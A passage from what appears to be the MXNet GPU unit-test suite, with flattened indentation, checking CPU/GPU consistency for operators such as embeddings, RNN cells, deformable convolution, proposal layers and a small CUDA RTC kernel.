ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
# Sizes are divisible by 8 to test TensorCore on Volta GPU.
sym = mx.sym.FullyConnected(num_hidden=8, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_activation_with_type():
act_types = ['relu', 'sigmoid', 'tanh', 'softrelu', 'softsign']
shape = (2, 2, 10, 10)
for act_type in act_types:
sym = mx.sym.Activation(name='act', act_type=act_type)
ctx_list = [{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_lrn():
sym = mx.sym.LRN(alpha=0.0001, beta=0.75, knorm=2, nsize=5, name='lrn')
ctx_list = [{'ctx': mx.gpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}},
{'ctx': mx.cpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_embedding_with_type():
def test_embedding_helper(data_types, weight_types, low_pad, high_pad):
NVD = [[20, 10, 20], [200, 10, 300]]
for N, V, D in NVD:
sym = mx.sym.Embedding(name='embedding', input_dim=V, output_dim=D)
ctx_list = []
for data_type in data_types:
for weight_type in weight_types:
ctx_list.append({'ctx': mx.gpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
ctx_list.append({'ctx': mx.cpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
arg_params = {'embedding_data': np.random.randint(low=-low_pad, high=V+high_pad, size=(N,))}
check_consistency(sym, ctx_list, grad_req={'embedding_data': 'null','embedding_weight': 'write'},
arg_params=arg_params)
data_types = [np.float16, np.float32, np.float64, np.int32]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 5, 5)
data_types = [np.uint8]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 0, 5)
@with_seed()
def test_svmoutput_with_type():
sym = mx.sym.SVMOutput(name='svmoutput', use_linear=True)
ctx_list = [{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}}]
check_consistency(sym, ctx_list, use_uniform=True)
@with_seed()
def test_take_with_type():
sym = mx.sym.take(name='take')
for data_ndim in range(2, 5):
for idx_ndim in range(1, 4):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=3, high=6), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=3, high=5), )
ctx_list = [{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}}]
arg_params = {'take_indices': np.random.randint(low=0,
high=data_shape[0],
size=idx_shape),
'take_a': np.random.normal(size=data_shape)}
check_consistency(sym, ctx_list,
grad_req={'take_indices': 'null',
'take_a': 'write'},
arg_params=arg_params)
def check_rnn_consistency(cell1, cell2):
dshape = (32, 5, 200)
data = mx.sym.Variable('data')
sym1, _ = cell1.unroll(5, data, merge_outputs=True)
mod1 = mx.mod.Module(sym1, label_names=None, context=mx.gpu(0))
mod1.bind(data_shapes=[('data', dshape)], label_shapes=None)
sym2, _ = cell2.unroll(5, data, merge_outputs=True)
mod2 = mx.mod.Module(sym2, label_names=None, context=mx.gpu(0))
mod2.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod1.init_params()
args, auxs = mod1.get_params()
args = cell1.unpack_weights(args)
args = cell2.pack_weights(args)
mod2.set_params(args, auxs)
batch=mx.io.DataBatch(data=[mx.random.uniform(shape=dshape)], label=[])
mod1.forward(batch, is_train=False)
mod2.forward(batch, is_train=False)
mx.test_utils.assert_allclose(mod1.get_outputs()[0], mod2.get_outputs()[0], rtol=1e-2, atol=1e-4)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnn():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='rnn_relu', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l0_'))
stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_forget_bias():
forget_bias = 2.0
fused = mx.rnn.FusedRNNCell(10, forget_bias=forget_bias, num_layers=2, mode='lstm', prefix='')
dshape = (32, 1, 20)
data = mx.sym.Variable('data')
sym, _ = fused.unroll(1, data, merge_outputs=True)
mod = mx.mod.Module(sym, label_names=None, context=mx.gpu(0))
mod.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod.init_params()
args, auxs = mod.get_params()
args = fused.unpack_weights(args)
bias_name = next(x for x in args if x.endswith('f_bias'))
expected_bias = forget_bias * np.ones(10, )
mx.test_utils.assert_allclose(args[bias_name], expected_bias)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_gru():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.GRUCell(100, prefix='l0_'))
stack.add(mx.rnn.GRUCell(100, prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_bidirectional():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='',
bidirectional=True)
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(100, prefix='l0_'),
mx.rnn.GRUCell(100, prefix='r0_'),
output_prefix='bi_gru_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(100, prefix='l1_'),
mx.rnn.GRUCell(100, prefix='r1_'),
output_prefix='bi_gru_1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_unfuse():
for mode in ['rnn_tanh', 'rnn_relu', 'lstm', 'gru']:
fused = mx.rnn.FusedRNNCell(
100, num_layers=2, mode=mode,
prefix='test_%s'%mode,
bidirectional=True,
dropout=0.5)
stack = fused.unfuse()
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed()
def test_deformable_psroipooling_with_type():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3,
np.dtype(np.float16): 1e-2}
arg_params = {
'deformable_psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# deformable psroipooling
sym = mx.sym.contrib.DeformablePSROIPooling(spatial_scale=0.0625, sample_per_part=4, group_size=3, pooled_size=3,
output_dim=2, trans_std=0.1, no_trans=False, name='deformable_psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
]
check_consistency(sym, ctx_list, scale=0.1, tol=tol,
grad_req={'deformable_psroipool_data': 'write',
'deformable_psroipool_rois': 'null',
'deformable_psroipool_trans': 'write'}, arg_params=arg_params)
@with_seed()
def test_deformable_convolution_with_type():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3}
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), name='deformable_conv')
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, scale=0.1, tol=tol,
grad_req={'deformable_conv_data': 'write',
'deformable_conv_offset': 'write',
'deformable_conv_weight': 'write',
'deformable_conv_bias': 'null'})
@with_seed()
def test_deformable_convolution_options():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3}
# 2D convolution
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
# Pad > 0
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), pad=(1,1), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Stride > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), stride=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Dilate > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Deformable group > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=4, kernel=(3,3), num_deformable_group=2, name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_residual_fused():
cell = mx.rnn.ResidualCell(
mx.rnn.FusedRNNCell(50, num_layers=3, mode='lstm',
prefix='rnn_', dropout=0.5))
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(2)]
outputs, _ = cell.unroll(2, inputs, merge_outputs=None)
assert sorted(cell.params._params.keys()) == \
['rnn_parameters']
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10, 50), rnn_t1_data=(10, 50))
assert outs == [(10, 2, 50)]
outputs = outputs.eval(ctx=mx.gpu(0),
rnn_t0_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
rnn_t1_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
rnn_parameters=mx.nd.zeros((61200,), ctx=mx.gpu(0)))
expected_outputs = np.ones((10, 2, 50))+5
assert np.array_equal(outputs[0].asnumpy(), expected_outputs)
def check_rnn_layer(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
with mx.gpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
co, cs = layer(x, states)
# atol of 1e-6 required, as exposed by seed 2124685726
assert_almost_equal(go, co, rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g, c, rtol=1e-2, atol=1e-6)
def check_rnn_layer_w_rand_inputs(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
x = mx.nd.uniform(shape=(10, 16, 30))
with mx.gpu(0):
x = x.copyto(mx.gpu(0))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = x.copyto(mx.cpu(0))
states = layer.begin_state(16)
co, cs = layer(x, states)
assert_almost_equal(go, co, rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g, c, rtol=1e-2, atol=1e-6)
@with_seed()
def test_sequence_reverse():
check_sequence_reverse(mx.gpu(0))
@with_seed()
def test_autograd_save_memory():
x = mx.nd.zeros((128, 512, 512), ctx=mx.gpu(0))
x.attach_grad()
with mx.autograd.record():
for i in range(200):
x = x + 1
x.wait_to_read()
x.backward()
@with_seed()
def test_cuda_rtc():
source = r'''
extern "C" __global__ void axpy(const float *x, float *y, float alpha) {
int i = threadIdx.x + blockIdx.x * blockDim.x;
y[i] += alpha * x[i];
}
extern "C" __global__ void saxpy(const float *x, float *y, float alpha) {
extern __shared__ float smem[];
int i = threadIdx.x + blockIdx.x * blockDim.x;
smem[threadIdx.x] = x[i];
y[i] += alpha * smem[threadIdx.x];
}
'''
module = mx.rtc.CudaModule(source)
axpy = module.get_kernel("axpy", "const float *x, float *y, float alpha")
x = mx.nd.ones((10,), ctx=mx.gpu(0))
y = mx.nd.zeros((10,), ctx=mx.gpu(0))
axpy.launch([x, y, 3.0], mx.gpu(0), (1, 1, 1), (10, 1, 1))
assert (y.asnumpy() == 3).all()
saxpy = module.get_kernel("saxpy", "const float *x, float *y, float alpha")
saxpy.launch([x, y, 4.0], mx.gpu(0), (1, 1, 1), (10, 1, 1), 10)
assert (y.asnumpy() == 7).all()
saxpy.launch([x, y, 5.0], mx.gpu(0), (2, 1, 1), (5, 1, 1), 5)
assert (y.asnumpy() == 12).all()
@with_seed()
def test_cross_device_autograd():
x = mx.nd.random.uniform(shape=(10,))
x.attach_grad()
with mx.autograd.record():
y = mx.nd.tanh(x)
y = y.copyto(mx.gpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.cpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.gpu(0))
y = y.copyto(mx.gpu(0))
y.backward()
dx = x.grad.copy()
x.grad[:] = 0
with mx.autograd.record():
y = x
for i in range(3):
y = mx.nd.tanh(y)
y.backward()
assert_almost_equal(dx, x.grad)
@with_seed()
def test_multi_proposal_op():
# paramters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
rpn_min_size = feature_stride
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
def get_new_data(batch_size, ctx):
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
dtype = np.float32
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = dtype, ctx = ctx)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = dtype, ctx = ctx)
im_info = mx.nd.empty((batch_size, 3), dtype = dtype, ctx = ctx)
cls = [1.0 * (i + 1) / cls_prob.size for i in range(cls_prob.size)]
np.random.shuffle(cls)
cls_prob = mx.nd.reshape(mx.nd.array(cls, dtype = dtype, ctx = ctx), shape = cls_prob.shape)
bbox_pred = mx.nd.array(np.random.randint(-2, 3, size = bbox_pred.shape), dtype = dtype, ctx = ctx)
for i in range(batch_size):
im_size = np.random.randint(600, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(80, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
return cls_prob, bbox_pred, im_info
def check_proposal_consistency(op, batch_size, with_nms=False):
'''
op is mx.nd.contrib.Proposal or mx.nd.contrib.MultiProposal
'''
cls_prob, bbox_pred, im_info = get_new_data(batch_size, mx.cpu(0))
rois_cpu, score_cpu = op(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
gpu_ctx = mx.gpu(0)
# copy data to gpu from cpu
cls_prob_gpu = cls_prob.as_in_context(gpu_ctx)
bbox_pred_gpu = bbox_pred.as_in_context(gpu_ctx)
im_info_gpu = im_info.as_in_context(gpu_ctx)
rois_gpu, score_gpu = op(
cls_prob = cls_prob_gpu,
bbox_pred = bbox_pred_gpu,
im_info = im_info_gpu,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
rois_cpu_np = rois_cpu.asnumpy()
rois_gpu_np = rois_gpu.asnumpy()
score_cpu_np = score_cpu.asnumpy()
score_gpu_np = score_gpu.asnumpy()
if not with_nms:
assert_almost_equal(score_cpu_np, score_gpu_np, atol = 1e-3, rtol = 1e-3)
assert_almost_equal(rois_cpu_np, rois_gpu_np, atol = 1e-3, rtol = 1e-3)
else:
# no 100% gurantee with nms
assert(np.sum(np.abs(score_cpu_np - score_gpu_np) < 1e-3) >= 10)
assert(np.sum(np.abs(rois_cpu_np - rois_gpu_np) < 1e-3) >= 40)
check_proposal_consistency(mx.nd.contrib.Proposal, 1)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5)
check_proposal_consistency(mx.nd.contrib.Proposal, 1, with_nms=True)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5, with_nms=True)
# The following 2 functions launch 0-thread kernels, an error that should be caught and signaled.
def kernel_error_check_imperative():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
with mx.np_shape(active=True):
a = mx.nd.array([1,2,3],ctx=mx.gpu(0))
b = mx.nd.array([],ctx=mx.gpu(0))
c = (a / b).asnumpy()
def kernel_error_check_symbolic():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
with mx.np_shape(active=True):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
c = a / b
f = c.bind(mx.gpu(0), { 'a':mx.nd.array([1,2,3],ctx=mx.gpu(0)),
'b':mx.nd.array([],ctx=mx.gpu(0))})
f.forward()
g = f.outputs[0].asnumpy()
def test_kernel_error_checking():
# Running tests that may throw exceptions out of worker threads will stop CI testing
# if not run in a separate process (with its own address space for CUDA compatibility).
try:
mpctx = mp.get_context('spawn')
except:
print('SKIP: python%s.%s lacks the required process fork-exec support ... ' %
sys.version_info[0:2], file=sys.stderr, end='')
else:
with discard_stderr():
for f in [kernel_error_check_imperative, kernel_error_check_symbolic]:
p = mpctx.Process(target=f)
p.start()
p.join()
assert p.exitcode != 0,\
"Expected a synchronous kernel error from %s(), none seen." % f.__name__
def test_incorrect_gpu():
# Try setting dev_id to a really big number
assert_raises(MXNetError, mx.nd.ones, (2,2), ctx=mx.gpu(100001))
@with_seed()
def test_batchnorm_backwards_notrain():
for ctx in [mx.cpu(0), mx.gpu(0)]:
for cudnn_o in [False, True]:
B,C,H,W = 4,3,2,2
x = mx.nd.random.poisson(1,shape=(B,C,H,W)).as_in_context(ctx)
gamma = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
beta = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
mean = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
std = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
x.attach_grad()
with autograd.record(False):
y = mx.ndarray.BatchNorm(x, gamma, beta, mean, std.square(),
fix_gamma=False, cudnn_off=cudnn_o)
loss=y.square().sum()
loss.backward(train_mode=False)
@with_seed()
def test_create_sparse_ndarray_gpu_to_cpu():
dim0 = 10
dim1 = 5
densities = [0, 0.5, 1]
for density in densities:
shape = rand_shape_2d(dim0, dim1)
matrix = rand_ndarray(shape, 'row_sparse', density)
data = matrix.data
indices = matrix.indices
rsp_created = mx.nd.sparse.row_sparse_array((data, indices), shape=shape, ctx=mx.cpu())
assert rsp_created.stype == 'row_sparse'
assert same(rsp_created.data.asnumpy(), data.asnumpy())
assert same(rsp_created.indices.asnumpy(), indices.asnumpy())
rsp_copy = mx.nd.array(rsp_created)
assert(same(rsp_copy.asnumpy(), rsp_created.asnumpy()))
@with_seed()
def test_softmax_activation():
gpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.gpu(0))
cpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.cpu())
cpu_a.attach_grad()
gpu_a.attach_grad()
with mx.autograd.record():
gpu_y = mx.nd.SoftmaxActivation(data = gpu_a)
cpu_y = mx.nd.SoftmaxActivation(data = cpu_a)
assert_almost_equal(cpu_y, gpu_y, atol = 1e-3, rtol = 1e-3)
gpu_y.backward()
cpu_y.backward()
assert_almost_equal(cpu_a.grad, gpu_a.grad, atol = 1e-3, rtol = 1e-3)
@with_seed()
def test_bilinear_sampler_versions():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym1 = mx.sym.BilinearSampler(data=data, grid=grid)
sym2 = mx.sym.BilinearSampler(data=data, grid=grid, cudnn_off=True)
sym3 = mx.sym.BilinearSampler(data=data, grid=grid)
test_cases = [[(1,3,15,16),(1,2,10,10)],
[(1,6,7,16),(1,2,10,4)],
[(1,7,3,16),(1,2,8,11)],
[(1,9,50,50),(1,2,50,50)]]
for item in test_cases:
data_shape, grid_shape = item
# kWriteTo
exe_cpu = sym1.simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req='write')
exe_gpu = sym2.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='write')
exe_cudnn = sym3.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='write')
exe_list = [exe_cpu, exe_gpu, exe_cudnn]
ref_idx = 0
test_data = np.random.uniform(low=-0.1, high=0.1,size=data_shape).astype(np.float32)
